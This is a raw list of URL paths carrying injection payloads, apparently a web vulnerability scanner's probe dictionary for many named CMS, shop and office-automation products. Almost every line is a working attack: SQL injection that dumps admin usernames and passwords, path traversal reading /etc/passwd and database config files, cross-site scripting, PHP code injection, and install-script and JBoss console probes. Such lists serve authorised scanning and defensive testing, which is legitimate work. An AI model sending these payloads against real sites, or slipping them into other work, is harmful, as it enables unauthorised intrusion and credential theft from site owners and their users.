/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/index.php?app=/../robots.txt%00
/index.php?app=user&ac=../../../robots.txt%00
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/index.php?c=buylist&a=dellist&id=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/index.php?caid=1&ccid12=12&fsale=$%7B@print(md5(1122))%7D
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/index.php?case=archive&act=orders
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT@typeid,2,3,concat(0x7e,md5(1122),0x7e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=10
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/index.php?case=tag&act=show&tag=%2522%20union%20select%,2%23
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/index.php?ctl=deals&k=pp%25%27%29and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23
/index.php?ctl=help&act=term%27%20and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/index.php?id=-1%7C%7C1%20group%20by%20mid(md5(1122)%20from%20rand()*10%20for%2030)having%20min(1)%23&mod=compare
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/index.php?keywords=zzz333&mod=search
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/index.php?m=Ajax&a=gettypeattr&type_id=1%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/index.php?m=Goods&a=showByUname&uname=%2527AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/index.php?m=Goods&a=showcate&id=1'cfreer
/index.php?m=Order&a=index
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=company&s=space_comments&uid=1%20and%20extractvalue(1,%20concat(0x5c,%20(select%20md5(1122)%20from%20information_schema.tables%20limit%201)));%20--
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=member&c=index&a=public_checkname_ajax&username=admin%25%252727%20and%201=1%23
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=message&s=inquiry_basket
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=poster&c=index&a=poster_click&id=1
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?mod=../admin/admin&a=list
/index.php?mod=../admin/admin&ac=list
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?s=/down/down/&file=./index.php
/index/searchInfoTcontentByCategory.action?infoSearchPid=8&infoSearchkey=1%25'%20AND%201=CHAR(106)%2bCHAR(106)%2bCHAR(106)%20AND%20'%25'='
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20--
/info.php
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/info_send_sign/sign.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161756c71,0x4876764d4b4b43744171,0x7166666571),NULL,NULL%23
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/install.log
/install.php
/install/
/install/index.php
/install/index.php.bak?insLockfile=1
/install/index.php?_m=frontpage&_a=check
/install/index.php?insLockfile=1
/install/index.php?step=1&insLockfile=1
/install/install.php.lock?step=2
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/install/step4.aspx
/install/svinfo.php
/installation/install.php
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/invest/full_success/a20141200142%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)%20--%20-.html
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/ippool.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?name=-1%27%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7%23
/ippool_edit.php/login.php/login.php/login.php/login.php/login.php?ID=-1%27%20UNION%20SELECT%201,2,3,md5(0x045154),5,6,7%23
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/item/?c-5,key-1'.html
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jcms/interface/ldap/ldapconf.xml
/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E
/jcms/jcms_files/jcms1/web1/site/module/messagebook/opr_readfile.jsp?filename=opr_readfile.jsp
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/jcms/oawindow/helpshow.jsp?message=%3Cscript%3Ealert(String.fromCharCode(52,%2050,%2056,%2055,%2051));%3C/script%3E
/jcms/setup/publishadmin.jsp
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jiaowu/jwgl/jxjh/jxjha.asp
/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
/jis/front/sdgs/updateuser.jsp
/jis/interface/offer.jsp?flag=user
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/jmx-console/
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/job/msearch-trunk/lastSuccessfulBuild/artifact/?pattern=C:/Windows/system.ini
/queryserverinfo.php?puchanid=%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28concat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29
/queryserverinfo.php?type=4&=3&puchanid=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/redmine/
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/reports/CreateReportTable.jsp?site=0
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/viewfile/?file=index.jsp
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/resume/?key=xxxx%bf%22;alert(360);//
/robots.txt
/robots.txt/360.php
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
/s/click.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHZlcnNpb24oKSwweDdlKSwwKSM=
/s/go.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHVzZXIoKSwweDdlKSwwKSM=
/samples/
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/script
/scripts/
/scripts/uistrings.cgi
/scrp/feedbackdetail.cfm?iSno=-4321%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/search.php?mod=information&ids=1-webscan&catid=1
/search.php?part=course&keywords=%27/**/AND/**/(SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(version(),(0x7C),md5(1122),(0x7C),FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.CHARACTER_SETS/**/GROUP/**/BY/**/x)a)/**/and/**/%27a%27=%27a
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=-1%27+and+1=2+union+select+NULL,char(106)%2bchar(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/searchLines.aspx?LName=h%25';
/searchLines.aspx?LName=h&t=webscan()'
/secure/Signup!default.jspa
/seeyon/main.do?method=certDown&realPath=../../base/conf/datasource.properties%00a
/seeyon/management/status.jsp
/selfservice/downfile/down?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/selfservice/infomanager/board/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/selfservice/welcome/downboard?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
